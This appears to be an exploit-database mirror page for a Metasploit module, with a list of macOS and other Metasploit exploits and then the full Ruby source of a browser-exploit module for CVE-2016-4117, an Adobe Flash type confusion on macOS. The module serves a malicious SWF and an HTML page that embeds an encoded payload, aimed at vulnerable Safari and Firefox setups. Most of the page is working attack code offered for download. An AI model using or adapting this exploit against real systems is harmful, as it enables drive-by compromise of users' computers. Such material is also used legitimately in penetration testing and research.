Menu

Improved exploit search engine. Try it out

"Adobe Flash Player - DeleteRangeTimelineOperation Type Confusion (Metasploit)"

Author

Metasploit

Platform

osx

Release date

2019-02-11

Release Date Title Type Platform Author
2019-02-11 "Adobe Flash Player - DeleteRangeTimelineOperation Type Confusion (Metasploit)" remote osx Metasploit
2016-09-09 "Airmail 3.0.2 - Cross-Site Scripting" webapps osx redrain
2016-12-16 "Horos 2.1.0 Web Portal - Directory Traversal" remote osx LiquidWorm
2015-10-26 "Apple Safari - User-Assisted Applescript Exec Attack (Metasploit)" remote osx Metasploit
2015-05-08 "MacKeeper - URL Handler Remote Code Execution" remote osx "Braden Thomas"
2011-03-09 "Apple QuickTime 7.5 - '.m3u' Remote Stack Buffer Overflow" remote osx KedAns-Dz
2010-03-26 "Apple Safari iPhone/iPod touch - Webpage Remote Code Execution" remote osx "Nishant Das Patnaik"
2010-03-26 "Apple Safari for iPhone/iPod touch - 'Throw' Exception Remote Code Execution" remote osx "Nishant Das Patnaik"
2008-07-11 "Apple iPhone / Apple iPod Touch < 2.0 - Multiple Remote Vulnerabilities" remote osx "Hiromitsu Takagi"
2008-04-21 "Apple iCal 3.0.1 - 'COUNT' Integer Overflow" remote osx "Core Security Technologies"
2008-03-22 "Apple Safari 3.1 - Window.setTimeout Variant Content Spoofing" remote osx "Juan Pablo Lopez Yacubian"
2008-03-17 "Apple Mac OSX Server 10.5 - Wiki Server Directory Traversal" remote osx "Rodrigo Carvalho"
2007-11-20 "Apple Mac OSX 10.5.x - Mail Arbitrary Code Execution" remote osx "heise Security"
2007-06-22 "Apple WebCore - XMLHTTPRequest Cross-Site Scripting" remote osx "Richard Moore"
2007-02-16 "Parallels - Drag and Drop Hidden Share" remote osx "Rich Mogull"
2007-01-12 "Apple Mac OSX 10.4.8 - DMG UFS Byte_Swap_Sbin() Integer Overflow" remote osx LMH
2006-09-26 "Skype Technologies Skype 1.5 - NSRunAlertPanel Remote Format String" remote osx "Tom Ferris"
2006-09-21 "Apple Mac OSX 10.x - AirPort Wireless Driver Multiple Buffer Overflow Vulnerabilities" remote osx "David Maynor"
2005-08-15 "Apple Mac OSX 10.4 Weblog Server - Cross-Site Scripting" remote osx "Donnie Werner"
2005-05-06 "4D WebSTAR 5.3/5.4 Tomcat Plugin - Remote Buffer Overflow" remote osx "Braden Thomas"
2005-05-04 "Apple Mac OSX 10.x - BlueTooth Directory Traversal" remote osx "Kevin Finisterre"
2004-11-01 "Apple Safari 1.2 Web Browser - TABLE Status Bar URI Obfuscation" remote osx "Gilbert Verdian"
2004-05-17 "Apple Mac OSX 10.3.x - Help Protocol Remote Code Execution" remote osx "Troels Bay"
2004-03-10 "Apple Safari 1.x - Cookie Directory Traversal" remote osx "Corsaire Limited"
2003-05-22 "Apple QuickTime/Darwin Streaming MP3Broadcaster - ID3 Tag Handling" remote osx "Sir Mordred"
2002-07-08 "Apple Mac OSX 10.1.x - SoftwareUpdate Arbitrary Package Installation" remote osx "Russell Harding"
2002-01-22 "Apple Mac OS Internet Explorer 3/4/5 - File Execution" remote osx "Jass Seljamaa"
2001-06-26 "Apple Mac OSX 10 - nidump Password File Disclosure" remote osx "Steven Kreuzer"
2001-06-10 "Apache 1.3.14 - Mac File Protection Bypass" remote osx "Stefan Arentz"
2012-01-17 "Mozilla Firefox 3.6.16 (OSX) - mChannel Use-After-Free (Metasploit) (2)" remote osx Metasploit
Release Date Title Type Platform Author
2019-05-23 "Shopware - createInstanceFromNamedArguments PHP Object Instantiation Remote Code Execution (Metasploit)" remote php Metasploit
2019-05-23 "Apple Mac OS X - Feedback Assistant Race Condition (Metasploit)" local macos Metasploit
2019-05-20 "GetSimpleCMS - Unauthenticated Remote Code Execution (Metasploit)" remote php Metasploit
2019-05-08 "Oracle Weblogic Server - 'AsyncResponseService' Deserialization Remote Code Execution (Metasploit)" remote multiple Metasploit
2019-05-08 "PostgreSQL 9.3 - COPY FROM PROGRAM Command Execution (Metasploit)" remote multiple Metasploit
2019-05-08 "Google Chrome 72.0.3626.119 - 'FileReader' Use-After-Free (Metasploit)" remote windows_x86 Metasploit
2019-05-02 "Ruby On Rails - DoubleTap Development Mode secret_key_base Remote Code Execution (Metasploit)" remote linux Metasploit
2019-04-30 "Pimcore < 5.71 - Unserialize RCE (Metasploit)" remote php Metasploit
2019-04-30 "AIS logistics ESEL-Server - Unauth SQL Injection RCE (Metasploit)" remote windows Metasploit
2019-04-25 "RARLAB WinRAR 5.61 - ACE Format Input Validation Remote Code Execution (Metasploit)" local windows Metasploit
2019-04-19 "Atlassian Confluence Widget Connector Macro - Velocity Template Injection (Metasploit)" remote multiple Metasploit
2019-04-19 "SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit)" local linux Metasploit
2019-04-18 "LibreOffice < 6.0.7 / 6.1.3 - Macro Code Execution (Metasploit)" local multiple Metasploit
2019-04-15 "Cisco RV130W Routers - Management Interface Remote Command Execution (Metasploit)" remote hardware Metasploit
2019-04-12 "Zimbra Collaboration - Autodiscover Servlet XXE and ProxyServlet SSRF (Metasploit)" remote linux Metasploit
2019-04-12 "Microsoft Windows - Contact File Format Arbitary Code Execution (Metasploit)" local windows Metasploit
2019-04-05 "WordPress 5.0.0 - Crop-image Shell Upload (Metasploit)" remote php Metasploit
2019-04-03 "Cisco RV320 and RV325 - Unauthenticated Remote Code Execution (Metasploit)" remote hardware Metasploit
2019-03-28 "Oracle Weblogic Server Deserialization RCE - Raw Object (Metasploit)" remote multiple Metasploit
2019-03-28 "CMS Made Simple (CMSMS) Showtime2 - File Upload RCE (Metasploit)" remote php Metasploit
2019-03-19 "Jenkins 2.137 and Pipeline Groovy Plugin 2.61 - ACL Bypass and Metaprogramming RCE (Metasploit)" remote java Metasploit
2019-03-18 "BMC Patrol Agent - Privilege Escalation Code Execution Execution (Metasploit)" remote multiple Metasploit
2019-03-13 "elFinder PHP Connector < 2.1.48 - exiftran Command Injection (Metasploit)" remote php Metasploit
2019-03-07 "Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)" remote php Metasploit
2019-03-07 "Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)" remote linux Metasploit
2019-03-07 "FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)" local freebsd_x86-64 Metasploit
2019-02-22 "Nuuo Central Management - Authenticated SQL Server SQL Injection (Metasploit)" remote windows Metasploit
2019-02-20 "Belkin Wemo UPnP - Remote Code Execution (Metasploit)" remote hardware Metasploit
2019-02-11 "NUUO NVRmini - upgrade_handle.php Remote Command Execution (Metasploit)" remote php Metasploit
2019-02-11 "Adobe Flash Player - DeleteRangeTimelineOperation Type Confusion (Metasploit)" remote osx Metasploit
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46339/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46339/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46339/40813/adobe-flash-player-deleterangetimelineoperation-type-confusion-metasploit/download/", "exploit_id": "46339", "exploit_description": "\"Adobe Flash Player - DeleteRangeTimelineOperation Type Confusion (Metasploit)\"", "exploit_date": "2019-02-11", "exploit_author": "Metasploit", "exploit_type": "remote", "exploit_platform": "osx", "exploit_port": null}
                                            

For full documentation follow the link above

Browse exploit DB API Browse

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::BrowserExploitServer

  def initialize(info = {})
    super(update_info(info,
      'Name'                => 'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion',
      'Description'         => %q(
       This module exploits a type confusion on Adobe Flash Player, which was
       originally found being successfully exploited in the wild. This module
       has been tested successfully on:
         macOS Sierra 10.12.3,
         Safari and Adobe Flash Player 21.0.0.182,
         Firefox and Adobe Flash Player 21.0.0.182.
      ),
      'License'             => MSF_LICENSE,
      'Author'              =>
        [
          'Genwei Jiang', # FireEye original blog details on the vulnerability
          'bcook-r7'      # Imported Metasploit module
        ],
      'References'          =>
        [
          ['CVE', '2016-4117'],
          ['BID', '90505'],
          ['URL', 'https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html'],
          ['URL', 'http://www.securitytracker.com/id/1035826'],
          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa16-02.html'],
          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb16-15.html'],
        ],
      'Payload'             =>
        {
          'DisableNops' => true
        },
      'Platform'            => ['osx'],
      'BrowserRequirements' =>
        {
          source: /script|headers/i,
          os_name: lambda do |os|
            os =~ OperatingSystems::Match::MAC_OSX
          end,
          ua_name: lambda do |ua|
            case target.name
            when 'Mac OS X'
              return true if ua == Msf::HttpClients::SAFARI
              return true if ua == Msf::HttpClients::FF
            end

            false
          end,
          flash: lambda do |ver|
            case target.name
            when 'Mac OS X'
              return true if Gem::Version.new(ver) <= Gem::Version.new('21.0.0.182')
            end

            false
          end
        },
      'Targets'             =>
        [
          [
            'Mac OS X', {
              'Platform' => 'osx',
              'Arch' => ARCH_X64
            }
          ]
        ],
      'Privileged'          => false,
      'DisclosureDate'      => 'Apr 27 2016',
      'DefaultTarget'       => 0))
  end

  def exploit
    @swf = create_swf

    super
  end

  def on_request_exploit(cli, request, target_info)
    print_status("Request: #{request.uri}")

    if request.uri.end_with? 'swf'
      print_status('Sending SWF...')
      send_response(cli, @swf, 'Content-Type' => 'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache')
      return
    end

    print_status('Sending HTML...')
    send_exploit_html(cli, exploit_template(cli, target_info), 'Pragma' => 'no-cache')
  end

  def exploit_template(cli, target_info)
    swf_random = "#{rand_text_alpha(3..7)}.swf"
    target_payload = get_payload(cli, target_info)
    b64_payload = Rex::Text.encode_base64(target_payload)

    if target.name.include? 'osx'
      platform_id = 'osx'
    end
    html_template = %(<html>
    <body>
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
    <param name="movie" value="<%=swf_random%>" />
    <param name="allowScriptAccess" value="always" />
    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>" />
    <param name="Play" value="true" />
    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>" Play="true"/>
    </object>
    </body>
    </html>
    )

    return html_template, binding
  end

  def create_swf
    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-4117', 'msf.swf')
    File.binread(path)
  end
end